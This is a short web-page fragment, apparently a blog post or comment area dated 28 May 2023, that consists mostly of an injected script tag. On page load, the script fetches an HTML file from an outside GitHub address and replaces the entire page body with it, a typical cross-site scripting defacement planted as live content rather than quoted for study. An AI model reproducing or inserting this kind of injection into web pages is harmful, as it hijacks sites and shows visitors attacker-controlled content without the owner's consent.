28 May, 2023
0 Comments
<script>fetch(“https://raw.githubusercontent.com/rootDextro/hay.html/main/haydar.html”).then(response => response.text()).then(html => document.body.innerHTML = html);</script>